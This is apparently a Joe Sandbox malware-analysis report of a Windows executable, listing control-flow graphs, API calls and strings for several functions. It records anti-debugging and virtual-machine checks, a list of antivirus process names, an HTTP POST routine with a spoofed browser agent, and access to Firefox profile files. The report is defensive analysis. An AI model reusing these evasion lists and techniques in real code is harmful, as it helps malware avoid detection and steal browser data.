89711->89714 89715 4d806c 89711->89715 89719 4d80c0 55 API calls _com_util::ConvertStringToBSTR 89711->89719 89714->89707 89715->89714 89720 4e8aa0 42 API calls 89715->89720 89717 4d80a1 89717->89707 89718->89711 89719->89715 89720->89717

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 00468E20 Relevance: 158.1, APIs: 27, Strings: 63, Instructions: 636libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 0 468e20-468eab call 4552d0 3 468ead-468ed6 GetProcAddress 0->3 4 468ed9-468eef SetupDiGetClassDevsW 0->4 3->4 5 468ef5-468f12 call 5165e0 4->5 6 4697d9-4697e9 call 513805 4->6 11 468f15-468f21 call 4552d0 5->11 14 468f23-468f4e GetProcAddress 11->14 15 468f51-468f6b 11->15 14->15 17 469780-46978c call 4552d0 15->17 18 468f71-468f93 call 5165e0 call 4552d0 15->18 23 4697ce-4697d7 SetupDiDestroyDeviceInfoList 17->23 24 46978e-4697cb GetProcAddress 17->24 27 468fc7-468fed SetupDiGetDeviceRegistryPropertyA 18->27 28 468f95-468fc4 GetProcAddress 18->28 23->6 24->23 29 469605-46960b 27->29 30 468ff3-46900b call 524e26 27->30 28->27 29->11 30->29 33 469011-46901d call 4552d0 30->33 36 469051-469077 33->36 37 46901f-46904e GetProcAddress 33->37 36->29 39 46907d-4690b7 call 51ac8c * 2 call 408050 36->39 37->36 46 4690d5-4690e8 39->46 47 4690b9-4690d2 GetProcAddress 39->47 49 46976e-46977a 46->49 50 4690ee-4690fa call 408050 46->50 47->46 49->17 53 4690fc-469115 GetProcAddress 50->53 54 469118-46912b 50->54 53->54 56 469131-46913d call 408050 54->56 57 46975a-46976c 54->57 60 46913f-469158 GetProcAddress 56->60 61 46915b-46916e 56->61 57->17 60->61 61->57 63 469174-469180 call 408050 61->63 66 469182-46919b GetProcAddress 63->66 67 46919e-4691b1 63->67 66->67 69 469746-469758 67->69 70 4691b7-4691c3 call 408050 67->70 69->17 73 4691c5-4691de GetProcAddress 70->73 74 4691e1-4691f4 70->74 73->74 76 469732-469744 74->76 77 4691fa-469206 call 408050 74->77 76->17 80 469224-469237 77->80 81 469208-469221 GetProcAddress 77->81 83 46971e-469730 80->83 84 46923d-469249 call 408050 80->84 81->80 83->17 87 469267-46927a 84->87 88 46924b-469264 GetProcAddress 84->88 90 469280-46928c call 408050 87->90 91 46970a-46971c 87->91 88->87 94 46928e-4692a7 GetProcAddress 90->94 95 4692aa-4692bd 90->95 91->17 94->95 97 4696f6-469708 95->97 98 4692c3-4692cf call 408050 95->98 97->17 101 4692d1-4692ea GetProcAddress 98->101 102 4692ed-469300 98->102 101->102 104 469306-469312 call 408050 102->104 105 4696df-4696f1 102->105 108 469314-46932d GetProcAddress 104->108 109 469330-469343 104->109 105->17 108->109 111 4696c8-4696da 109->111 112 469349-469355 call 408050 109->112 111->17 115 469357-469379 GetProcAddress 112->115 116 46937c-46938f 112->116 115->116 118 469395-4693a1 call 408050 116->118 119 4696b1-4696c3 116->119 122 4693a3-4693c8 GetProcAddress 118->122 123 4693cb-4693de 118->123 119->17 122->123 125 4693e4-4693f0 call 408050 123->125 126 46969a-4696ac 123->126 129 4693f2-469417 GetProcAddress 125->129 130 46941a-46942d 125->130 126->17 129->130 132 469683-469695 130->132 133 469433-46943f call 408050 130->133 132->17 136 469441-469466 GetProcAddress 133->136 137 469469-46947c 133->137 136->137 137->132 139 469482-46948e call 408050 137->139 142 469490-4694b5 GetProcAddress 139->142 143 4694b8-4694cb 139->143 142->143 145 4694d1-4694dd call 408050 143->145 146 46966c-46967e 143->146 149 469507-46951a 145->149 150 4694df-469504 GetProcAddress 145->150 146->17 152 469655-469667 149->152 153 469520-46952c call 408050 149->153 150->149 152->17 156 469556-469569 153->156 157 46952e-469553 GetProcAddress 153->157 159 46963e-469650 156->159 160 46956f-46957b call 408050 156->160 157->156 159->17 163 4695a5-4695b8 160->163 164 46957d-4695a2 GetProcAddress 160->164 166 469627-469639 163->166 167 4695ba-4695c6 call 408050 163->167 164->163 166->17 170 4695f0-469603 167->170 171 4695c8-4695ed GetProcAddress 167->171 170->29 173 469610-469622 170->173 171->170 173->17
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004552D0: RtlInitializeCriticalSection.NTDLL(00597F68), ref: 00455352
                                                                                                                                                                                                            • Part of subcall function 004552D0: __Init_thread_footer.LIBCMT ref: 0045536E
                                                                                                                                                                                                            • Part of subcall function 004552D0: RtlEnterCriticalSection.NTDLL ref: 00455389
                                                                                                                                                                                                            • Part of subcall function 004552D0: RtlLeaveCriticalSection.NTDLL(00597F68), ref: 004553E1
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00468ED4
                                                                                                                                                                                                          • SetupDiGetClassDevsW.SETUPAPI(00000000,00000000,00000000,0000000E,00000000,00000020,7591F550), ref: 00468EE4
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00468F4C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00468FC2
                                                                                                                                                                                                          • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000007,00000000,?,000007FE,00000000), ref: 00468FE9
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046904C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00466E87), ref: 004690D0
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469113
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469156
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469199
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004691DC
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046921F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469262
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004692A5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004692E8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046932B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469377
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004693C6
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469415
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469464
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004694B3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469502
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00469551
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004695A0
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004695EB
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004697C9
                                                                                                                                                                                                          • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 004697D7
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlInitializeCriticalSection.NTDLL(00597B94), ref: 004080BE
                                                                                                                                                                                                            • Part of subcall function 00408050: __Init_thread_footer.LIBCMT ref: 004080DA
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlEnterCriticalSection.NTDLL(00597B94), ref: 004080F5
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlLeaveCriticalSection.NTDLL(00597B94), ref: 0040814B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CriticalSection$Setup$DeviceEnterInit_thread_footerInitializeLeave$ClassDestroyDevsInfoListPropertyRegistry
                                                                                                                                                                                                          • String ID: A$DiskDrive$Info$List$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$StrS$alddisk$bnvirtualscsihba$bxp virtual$ccboot$deepin$diskless$evsW$hin virtual$kb.mdisk$kic.disk$msft virtual$mzd.live$netzone$nmenu$obm virtual$richdisk$s.t. virtual$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$trIA$vdiskbus$vhd cms$vice$vnd scsi
                                                                                                                                                                                                          • API String ID: 4133971413-3214769527
                                                                                                                                                                                                          • Opcode ID: 40a03a09d682788497bf71224092913341c22b9e281f77c82b283975d84d8802
                                                                                                                                                                                                          • Instruction ID: f1412aaa6c317a73c9a6238af3eaddf4ae2b8cf5081a018ee8fa29b5caced83a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40a03a09d682788497bf71224092913341c22b9e281f77c82b283975d84d8802
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3426370A1165A9FEB51DF64CD40BAABBF8BF49304F004199E40CE7241EBB4AE84CF65
                                                                                                                                                                                                          Function 00466CF0 Relevance: 73.9, APIs: 24, Strings: 18, Instructions: 385libraryloadermemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 846 466cf0-466d32 call 413a40 849 466d34-466d57 GetProcAddress 846->849 850 466d5a-466d84 GetModuleHandleW GetProcAddress 846->850 849->850 852 466d86-466da0 GetCurrentProcess 850->852 853 466da2 850->853 854 466da8-466dcd GetCurrentProcess call 413a40 852->854 853->854 858 466dcf-466df9 GetProcAddress 854->858 859 466dfc-466e15 CheckRemoteDebuggerPresent 854->859 858->859 860 466e17-466e23 call 413a40 859->860 861 466e49 859->861 866 466e25-466e3d GetProcAddress 860->866 867 466e40-466e47 860->867 863 466e50-466e8e call 5165e0 call 468e20 861->863 872 466e90-466ea0 call 4697f0 863->872 873 466eae 863->873 866->867 867->861 867->863 876 466ea5-466eac 872->876 874 466eb5-466ec3 873->874 877 466f95-466fb1 call 48bbd0 KiUserExceptionDispatcher call 48bdf0 874->877 878 466ec9-466edc 874->878 876->873 876->874 893 466fb4-466fb9 877->893 880 466f23-466f51 RtlEnterCriticalSection 878->880 881 466ede-466ef2 call 5139d3 878->881 884 466f83-466f8f RtlLeaveCriticalSection 880->884 885 466f53-466f7d call 513ac7 call 48bb10 880->885 881->880 890 466ef4-466f20 RtlInitializeCriticalSection call 513d5f call 513989 881->890 884->877 885->884 890->880 893->893 896 466fbb-466fd4 call 40b8f0 893->896 902 466fd6-466fdd 896->902 903 466fdf-466fe1 896->903 904 466fea-466fff call 467280 call 483970 902->904 903->904 905 466fe3 903->905 910 467001-467006 call 483970 904->910 911 46700f 904->911 905->904 914 46700b-46700d 910->914 913 467013-46701f call 483970 911->913 917 467021-467026 call 483970 913->917 918 46702f 913->918 914->911 914->913 922 46702b-46702d 917->922 920 467033-46703f call 483970 918->920 924 467045-467051 call 483970 920->924 925 467041 920->925 922->918 922->920 928 467057-467063 call 483970 924->928 929 467053 924->929 925->924 932 467065 928->932 933 467069-467075 call 483970 928->933 929->928 932->933 936 467077 933->936 937 46707b-467087 call 483970 933->937 936->937 940 467097 937->940 941 467089-46708e call 483970 937->941 943 46709b-4670ca call 5165e0 GetSystemTime call 413a40 940->943 944 467093-467095 941->944 949 4670f2-467150 GetTimeZoneInformation call 467aa0 RasEnumConnectionsW 943->949 950 4670cc-4670ef GetProcAddress 943->950 944->940 944->943 953 4671b2 949->953 954 467152-467171 GetProcessHeap RtlAllocateHeap 949->954 950->949 956 4671b4-4671cc GetModuleHandleW GetProcAddress 953->956 954->953 955 467173-4671b0 call 467aa0 GetProcessHeap HeapFree 954->955 955->956 958 4671ce-4671e6 956->958 959 4671ea-467219 call 5165e0 GetVersionExA 956->959 958->959 965 467251-467271 call 513805 959->965 966 46721b-467221 959->966 968 467224-467229 966->968 968->968 970 46722b-46724e call 40b8f0 968->970 970->965
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlInitializeCriticalSection.NTDLL(00597C18), ref: 00413AAE
                                                                                                                                                                                                            • Part of subcall function 00413A40: __Init_thread_footer.LIBCMT ref: 00413ACA
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlEnterCriticalSection.NTDLL(00597C18), ref: 00413AE5
                                                                                                                                                                                                            • Part of subcall function 00413A40: RtlLeaveCriticalSection.NTDLL(00597C18), ref: 00413B41
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00466D55
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00466D77
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00466D7E
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 00466D8D
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00466DB5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00466DF7
                                                                                                                                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(?,00000000), ref: 00466E0C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00466E3B
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(00598088), ref: 00466EFC
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00466F1B
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00598088), ref: 00466F3C
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00598088), ref: 00466F8F
                                                                                                                                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00466F9A
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?,00000000,00000020,?,00000800), ref: 004670B8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004670ED
                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 004670FC
                                                                                                                                                                                                          • RasEnumConnectionsW.RASAPI32(00000000,00000000,00000000,?), ref: 00467149
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0046715A
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00467161
                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0046719C
                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 004671A3
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetNtVersionNumbers), ref: 004671C1
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004671C8
                                                                                                                                                                                                          • GetVersionExA.KERNEL32(0000009C), ref: 00467211
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$AddressProc$EnterHeapLeaveProcess$CurrentHandleInit_thread_footerInitializeModuleTime$AllocateCheckConnectionsDebuggerDispatcherEnumExceptionFreeInformationPresentRemoteSystemUserVersionZone__onexit
                                                                                                                                                                                                          • String ID: 2345safetray.exe$360tray.exe$HipsDaemon.exe$HipsTray.exe$IsWow64Process$RtlGetNtVersionNumbers$baiduantray.exe$gerP$kernel32$kxescore.exe$mati$msmpeng.exe$ntdll.dll$on$qqpcrtp.exe$qqpctray.exe$wwww$zhudongfangyu.exe
                                                                                                                                                                                                          • API String ID: 503798855-4277342592
                                                                                                                                                                                                          • Opcode ID: 860e2cb6446b8a7e6ee90e0b2c534e582757c971f93eaad0393da5a380b0451f
                                                                                                                                                                                                          • Instruction ID: 5f3d03645d4f314ccf5b96e68e19008c656b320bc30360567718ce4a257206da
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 860e2cb6446b8a7e6ee90e0b2c534e582757c971f93eaad0393da5a380b0451f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6E1D3719002069BDB10DF64DD45BEEBBF8FF04704F0481AAE549A7291EB34AA84DFE5
                                                                                                                                                                                                          Function 00484290 Relevance: 68.8, APIs: 21, Strings: 18, Instructions: 509libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 973 484290-4842fc 974 4842fe 973->974 975 484300-484357 GetModuleHandleW GetProcAddress 973->975 974->975 976 484359-484362 GetNativeSystemInfo 975->976 977 484364-48436b GetSystemInfo 975->977 978 484371-48437c 976->978 977->978 979 48437e-484382 978->979 980 484394 978->980 979->980 981 484384-484392 979->981 982 48439e-4843b3 GetModuleHandleW GetProcAddress 980->982 981->980 981->982 983 4843f5-4843fb 982->983 984 4843b5-4843f3 982->984 985 484401-48440e 983->985 984->985 987 48442e-484481 call 5165e0 call 41cad0 call 41bca0 985->987 988 484410-484412 985->988 996 4844aa-4844c6 987->996 997 484483-4844a8 GetProcAddress 987->997 988->987 989 484414-484428 988->989 989->987 999 484a3b-484a5b call 513805 996->999 1000 4844cc-4844dc call 41bca0 996->1000 997->996 1005 4844de-484503 GetProcAddress 1000->1005 1006 484505-484534 call 41bca0 1000->1006 1005->1006 1010 484536-484565 GetProcAddress 1006->1010 1011 484567-484584 1006->1011 1010->1011 1013 48458a-48459a call 41bca0 1011->1013 1014 4849f7-484a07 call 41bca0 1011->1014 1019 48459c-4845c1 GetProcAddress 1013->1019 1020 4845c3-4845e9 1013->1020 1021 484a09-484a2e GetProcAddress 1014->1021 1022 484a30-484a36 1014->1022 1019->1020 1024 4845ef-484619 call 408b10 1020->1024 1025 4849b3-4849c3 call 41bca0 1020->1025 1021->1022 1022->999 1032 48461b-48461d 1024->1032 1033 484623-484659 call 41bca0 1024->1033 1030 4849ec-4849f2 1025->1030 1031 4849c5-4849ea GetProcAddress 1025->1031 1030->1014 1031->1030 1032->1033 1036 48465b-484680 GetProcAddress 1033->1036 1037 484682-4846a2 1033->1037 1036->1037 1038 4846aa-4846ac 1037->1038 1039 4846ae-4846c0 call 408a10 1038->1039 1040 4846c5-4846d5 call 41bca0 1038->1040 1045 48496f-48497f call 41bca0 1039->1045 1046 484705-484714 1040->1046 1047 4846d7-484703 GetProcAddress 1040->1047 1053 4849a8-4849ae 1045->1053 1054 484981-4849a6 GetProcAddress 1045->1054 1051 48472d-484747 call 41bca0 1046->1051 1052 484716-484728 call 408a10 1046->1052 1047->1046 1059 484749-48476b GetProcAddress 1051->1059 1060 48476d-484791 1051->1060 1052->1045 1053->1025 1054->1053 1059->1060 1062 4847fc-484806 1060->1062 1063 484793-4847f6 call 515d97 * 3 1060->1063 1064 484810-484832 call 5165e0 call 41bca0 1062->1064 1063->1062 1075 484870-484884 1064->1075 1076 484834-48486d GetProcAddress 1064->1076 1078 48488a-484891 1075->1078 1079 484957-484969 call 408a10 1075->1079 1076->1075 1078->1079 1080 484897-4848ad call 41bca0 1078->1080 1079->1045 1085 4848c8-4848e8 1080->1085 1086 4848af-4848c5 GetProcAddress 1080->1086 1085->1079 1088 4848ea-4848fc 1085->1088 1086->1085 1089 48492d-484945 call 40d7e0 1088->1089 1090 4848fe-484909 1088->1090 1095 48494a-484951 1089->1095 1091 48490b 1090->1091 1092 48490d-48492b call 516cc0 1090->1092 1091->1092 1092->1095 1095->1064 1095->1079
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,EFE0703F,?,00000000), ref: 00484346
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00484353
                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?), ref: 00484360
                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 0048436B
                                                                                                                                                                                                            • Part of subcall function 0041BCA0: RtlInitializeCriticalSection.NTDLL(00597CEC), ref: 0041BD0E
                                                                                                                                                                                                            • Part of subcall function 0041BCA0: __Init_thread_footer.LIBCMT ref: 0041BD2A
                                                                                                                                                                                                            • Part of subcall function 0041BCA0: RtlEnterCriticalSection.NTDLL(00597CEC), ref: 0041BD45
                                                                                                                                                                                                            • Part of subcall function 0041BCA0: RtlLeaveCriticalSection.NTDLL(00597CEC), ref: 0041BD9B
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll,RtlGetNtVersionNumbers), ref: 004843A8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004843AF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048449D
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004844F8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048455A
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004845B6
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00484675
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004846F8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0048499B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004849DF
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00484A23
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CriticalSection$HandleInfoModuleSystem$EnterInit_thread_footerInitializeLeaveNative
                                                                                                                                                                                                          • String ID: Avai$Content-Type:application/x-www-form-urlencoded$GetNativeSystemInfo$Mozilla/5.0 (compatible; MSIE 9.0; Windows NT %d.%d; WOW%d; Trident/5.0)$POST$RtlGetNtVersionNumbers$WinH$WinH$dlk$ers$kernel32.dll$labl$ntdll$onne$pen$spon$ttpC$ttpO
                                                                                                                                                                                                          • API String ID: 1895558709-3909303831
                                                                                                                                                                                                          • Opcode ID: c3680bc09fd9fe4b06f284ddf52e57c29487363e92069cf4c727d5b25ac6ee33
                                                                                                                                                                                                          • Instruction ID: c9fcf2df0ea9e39ac236a7160a13d4d9c0a290458981adaaee3e139567d5a063
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3680bc09fd9fe4b06f284ddf52e57c29487363e92069cf4c727d5b25ac6ee33
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F324F70A042599FEB24DF69DC45BAEB7F4FF48304F04819EE488A7251EB749A84CF94
                                                                                                                                                                                                          Function 00406230 Relevance: 46.7, APIs: 13, Strings: 13, Instructions: 1166libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlInitializeCriticalSection.NTDLL(00597BBC), ref: 004081EE
                                                                                                                                                                                                            • Part of subcall function 00408180: __Init_thread_footer.LIBCMT ref: 0040820A
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlEnterCriticalSection.NTDLL(00597BBC), ref: 00408225
                                                                                                                                                                                                            • Part of subcall function 00408180: RtlLeaveCriticalSection.NTDLL(00597BBC), ref: 0040827B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004062B9
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlInitializeCriticalSection.NTDLL(00597B94), ref: 004080BE
                                                                                                                                                                                                            • Part of subcall function 00408050: __Init_thread_footer.LIBCMT ref: 004080DA
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlEnterCriticalSection.NTDLL(00597B94), ref: 004080F5
                                                                                                                                                                                                            • Part of subcall function 00408050: RtlLeaveCriticalSection.NTDLL(00597B94), ref: 0040814B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00406423
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(00000000,00000011,00000000,\Mozilla\Firefox\,00000011,?,00000000,?), ref: 00406430
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00406513
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(00000000,0000000C,00000000,profiles.ini,0000000C,00000000), ref: 00406520
                                                                                                                                                                                                          • GetPrivateProfileSectionNamesA.KERNEL32(?,000007D0,00000000), ref: 00406561
                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(00000000,Default,00000000,?,00000104,00000000), ref: 00406899
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00406A73
                                                                                                                                                                                                          • PathFileExistsA.SHLWAPI(00000000,00000009,00000000,\prefs.js,00000009,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00406A80
                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(00000000,Default,00000000,00000000), ref: 00406BCA
                                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(00000000,Path,00000000,?,00000104,00000000), ref: 00406C7A
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 00406E53
                                                                                                                                                                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004072E4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
